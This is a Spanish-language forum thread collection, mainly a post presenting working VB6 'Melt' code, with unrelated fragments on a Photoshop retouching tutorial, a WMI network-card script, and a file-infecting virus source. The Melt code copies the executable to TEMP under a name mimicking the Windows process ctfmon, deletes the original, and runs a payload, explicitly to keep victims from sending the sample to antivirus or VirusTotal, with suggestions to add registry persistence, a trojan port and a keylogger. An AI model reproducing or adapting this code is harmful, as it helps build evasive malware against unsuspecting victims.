Mensajes

[Definición]

Bueno, aquí otro de mis mini códigos para hacer "Melt" en VB6, pero antes... ¿que significa "Melt"?

Definición
Se llama "Melt" cuando un usuario ejecuta un archivo y este desaparece (se auto-elimina) después de ejecutarse, esta función es necesaria para evitar que nuestra víctima ejecute 2 veces nuestro malware o evitar que la victima lo envíe a un Antivirus o a virustotal después de ejecutarlo, su estructura es...

1) Ejecuto el archivo (A)
2) El archivo (A) se copia en otro lugar (B)
3) El archivo (A) ejecuta el archivo (B)
4) El archivo (B) borra el archivo (A)
5) El archivo (B) sigue ejecutando el resto de malware...

Como he dicho, esto es ideal para evitar que existan 2 procesos iguales abiertos en el sistema (para evitar que nuestro keylogger sea ejecutado 2 veces, o nuestro troyano intente escuchar 2 veces por el mismo puerto, etc). Así también evitas que la víctima envíe el archivo a un análisis después de ejecutarlo xD



Aquí el código:

Código (vb) [Seleccionar] Expandir

Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long

Sub Main()
    'Obtenemos el nombre de nuestro ejecutable
    MyName = App.EXEName
   
    'Comprobamos si nos llamamos CTFMON
    If LCase(App.EXEName) = "cftmon" Then
        Call Execute
    Else
        Call MeltFile
    End If
End Sub

Function Execute()
    'Función que se encarga de borrar el archivo original a partir
    'de su ruta. Al terminar ejecuta el PayLoad
   
    On Error Resume Next

    If Not IsEmpty(Command$) Then   'Verificamos si tenemos algo en los argumentos
        While Dir(Command$) <> ""   'Comprobamos si existe el archivo que tenemos en los argumentos
            Kill Command$           '   Si existe... lo borramos
            DoEvents                '   Esperamos un poco
        Wend                        'Bucle
    End If
    Call PayLoad                    'Ejecutamos el resto del Malware
End Function

Function MeltFile()
    'Función que copia el propio Malware en la carpeta TEMP del sistema
    'con el nombre de cftmon.exe. Ejecuta luego el archivo enviando como
    'argumento su propia ruta.
   
    Dim MySelf As String
    MySelf = String$(255, Chr$(0))

    GetModuleFileName 0, MySelf, Len(MySelf)        'Devuele la ruta correcta de tu aplicación

    FileCopy MySelf, Environ("TMP") & "\cftmon.exe" 'Nos copiamos en "TEMP\cftmon.exe"
    DoEvents                                        'Esperamos...
    Shell Environ("tmp") & "\cftmon.exe " & MySelf  'Ejecutamos "TMP\cftmon.exe" + Ruta de tu aplicación
    End                                             'Finalizamos (importante! xD)
End Function

Function PayLoad()
    'Aqui incluimos el resto de código de tu Malware...
    'Recomiendo llamar ahora a la función de AddToRegedit() para añadir la
    'aplicación con el Melt (cftmon.exe) al registro, abrir el puerto del troyano
    'activar el keylogger o lo que quieras programar :P
   
    MsgBox "Si estas leyendo esto es que tu aplicación ha hecho MELT y se ha borrado el archivo original, :P", vbInformation, "Melt in VB6"
    End
End Function


Si quieres evitar que tu aplicación sea ejecutada 2 veces también puedes crearte un MuteX, pero la función "Melt" hace lo mismo que el MuteX y encima borra el archivo original (para evitar análisis de AV's).

Saludos!! (Espero comentarios!!)

Codigo fuente adjunto al post (solo usuarios registrados)

[AVISO]

e descubierto que en mi ordenador habia un zombie que controlaba  un programa llamado doshttp(o eso creo) y este programa estaba orientado a este foro...
tenia la firma de un tal moskito o algo asi
ya le he borrado.....

AVISO

Bueno, aprovecho para avisar a los demas usuarios del foro que si encontrais en vuestro PC algun programa parecido a "DoS-HTTP" "HackTool" o similares que nos envíen una copia del archivo a cualquier Moderador/Colaborador/Administrador del foro.

Teniendo en nuestras manos el propio programa que realiza los ataques será más facil detenerlo.

Gracias a todos!!

Utiliza Api Hooking, el GetAnsycKeyState no funciona bien y consume muchos recursos al estar dentro de un timer.

Saludos!!

Una cosa, yo estoy trabajando en un modulo para hacer aplicaciones trial... exactamente que quieres hacer?

Quieres que tu programa dure 30 dias y luego pida un serial para desbloquear? O quieres que pasado 30 dias deje de funcionar?

Saludos!!

[Como arreglar dientes y mejoras en general]

Como arreglar dientes y mejoras en general

Hola, primero ante todo decir que no soy nada experto en Photoshop, y este es mi primer tutorial... empecemos!!

Primero nos descargamos la foto original, yo he usado la dentadura de una chica que necesita ortodoncia... pero nosotros se lo arreglaremos con el Photoshop

Paso 1	Cargamos nuestra imagen en una sola capa llamada Original
Paso 2	Duplicamos la capa (Ctrl+J) y usamos la "Herramienta de marco Rectangular" (M) y hacemos una selección como la de la foto
Paso 3	Pulsamos Ctrl+T para entrar en el modo de "Transformación Libre" la selección cambiará de forma como en la foto
Paso 4	Usamos nuestro ratón para agrandar la selección hacia la derecha y cubrir así el espacio que hay en los dientes, mirar la foto
Paso 5	Combinamos la capa de arriba con la de abajo (Ctrl+E), usamos la herramienta "Lazo" (L) y con mucho cuidado selecionamos los dientes. Si te equivocas mantén pulsado Ctrl para añadir selección o Alt para quitar selección. Mirar la foto
Paso 6	Con la herramienta de Lazo aun seleccionada, pulsamos click derecho y marcamos la opción: "Capa vía copiar" Así crearemos una nueva capa con solo los dientes seleccionados
Paso 7	Aquí vemos la nueva capa creada, podemos borrar o modificar cosas si vemos que aun no está bien
Paso 8	Pulsamos Ctrl+U para entrar en HUE/Saturatión (Menu Imagen/Ajustes/HUE/Saturation. Seleccionamos el canal Amarillo y le quitamos Saturación y añadimos brillo
Paso 9	Como veis, el resultado es inmediato, pero en algunos casos se obtiene un efecto de "marfil" muy falso, lo solucionaremos cambiando la opacidad de la capa de dientes o su modo de fusión (yo lo puse en "Luz Neutral")
Paso 10	Cuando lo tenemos todo perfecto, combinamos capas (Ctrl+E) y creamos una nueva capa (Ctrl+J) llamada nariz, usamos el "Lazo" (L) y seleccionamos todo el conjunto de nariz y boca, entramos en el modo de Transformación Libre (Ctrl+T) y con el raton "rotamos" un poco el conjunto (ver foto!)
Paso 11	Quitamos la visibilidad de la capa del fondo, mostrando así el desplazamiento que hemos provocado. Seleccionamos nuestro "Borrador" y lo configuramos como: Diametro 10 y Dureza 0
Paso 12	Borramos todo el borde, así evitamos que se vea la rotación cuando juntemos las 2 capas. Fíjate que estamos borrando la capa de la nariz y la Original esta invisible! cuando termines pon la Original en modo visible.
Paso 13	Cuando termines, combina las 2 capas (Ctrl+E) y entra en el modo "Licuar" (Mayusculas+Ctrl+X) dentro de: Menu Filtro / Licuar, seleccionamos nuestra herramienta de "Desinflar" (S) y configuramos los parámetros así (ver foto)
Paso 14	Pulsamos varias veces encima d ela nariz para dejarla un poco más delgada, hay que ir cuidado con esta opción, siempre podemos retroceder pulsando Ctrl+Z, cuando termines acepta y mira el resultado (ver foto)
Paso 15	Seleccionamos nuestro "Pincel Corrector" (J) para borrar ese granito de la derecha lo configuramos como en la foto
Paso 16	Situamos nuestro ratón en una zona de la cara limpia y sin impurezas, pulsamos la tecla ALT y el cursor cambiará de forma, hacemos un solo click y soltamos el raton y la tecla ALT, ahora nos situamos encima de la imperfección, hacemos click y buala! el granito desaparece

Bueno, hasta aqui el fin de tuto. En principio quería hacerlo más extenso pero me he agobiado, os pongo la foto original y como la he dejado yo, por si alguien quiere continuar:



Si usais firefox o algún otro explorador con pestañas podreis ver la foto original y mi "retoque" pasando de una a otra para apreciar las diferecnias. Saludos!!

(Espero comentarios, es mi primer tuto!)

And teh source is...

Código [Seleccionar] Expandir


For i = 1 To 100
    Text1.Text = Text1.Text & i & vbCrLf
    Text1.SelStart = Len(Text1.Text)
Next i


Jo... pues no se si sera mi firewall pero a mi no me sale nada en los cuadritos...

Ummm, el script recoge la información de tu tarjeta de red...

Cuantas tarjetas de red tienes en tu equipo?

Si quieres aprender ha hacer un buscador de archivos en VB yo empezaría por aprender a usar el buscador de este foro

La próxima vez te eliminaré el post, esto que preguntas está muy repetido...

Saludos

Hola!!

Aqui vuelve con otro de mis sources, este está basado en un script WMI que encontré en mi editor VBSEdit3

La gracia de este código es que puedes obtener mucha información acerca de todas las tarjetas de red (NIC'S) que hay en un mismo PC, asi como saber si un equipo tiene más de una IP, más de un server DNS, DHCP, etc...

Adjunto foto, el código en VB y el código WMI original en VBS.



Saludos!!

[OJO no el código compilado en vuestra maquina, porque infectaria vuestros archivos xD Ir con cuidado, Saludos!!]

Es el que hablan en ucestion en este post, que esta para bajar el source.

En cada proceso y archivo que ejecuta la PC se abre una ventana que dice "Aqui empieza el código del PayLoad, añade las funciones que desees, como por ejemplo un webdownloader o un irc_bot"

Saludos.

Vaya tela, mira que dije claramente: OJO no el código compilado en vuestra maquina, porque infectaria vuestros archivos xD Ir con cuidado, Saludos!!

Bueno, si ha sido con el mismo source de la primera pagina se puede crear una simple vacuna cambiando unos valores... pero ahora mismo no tengo tiempo ni de mirarmelo. Tendrás que esperar al fin de semana o esperar a ver si algu usuario lo hace